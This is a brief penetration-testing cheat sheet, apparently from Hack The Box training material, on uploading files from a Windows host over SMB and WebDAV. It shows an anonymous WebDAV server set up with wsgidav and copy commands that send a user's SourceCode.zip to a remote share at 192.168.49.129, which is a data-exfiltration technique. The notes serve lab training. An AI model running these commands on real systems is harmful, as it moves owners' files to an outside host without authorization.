SMB Uploads
Configuring WebDav Server
$ sudo pip install wsgidav cheroot
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Connecting to the WebDAV share
C:\htb> dir \\192.168.49.128\DavWWWRoot
Uploading Files
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
Last updated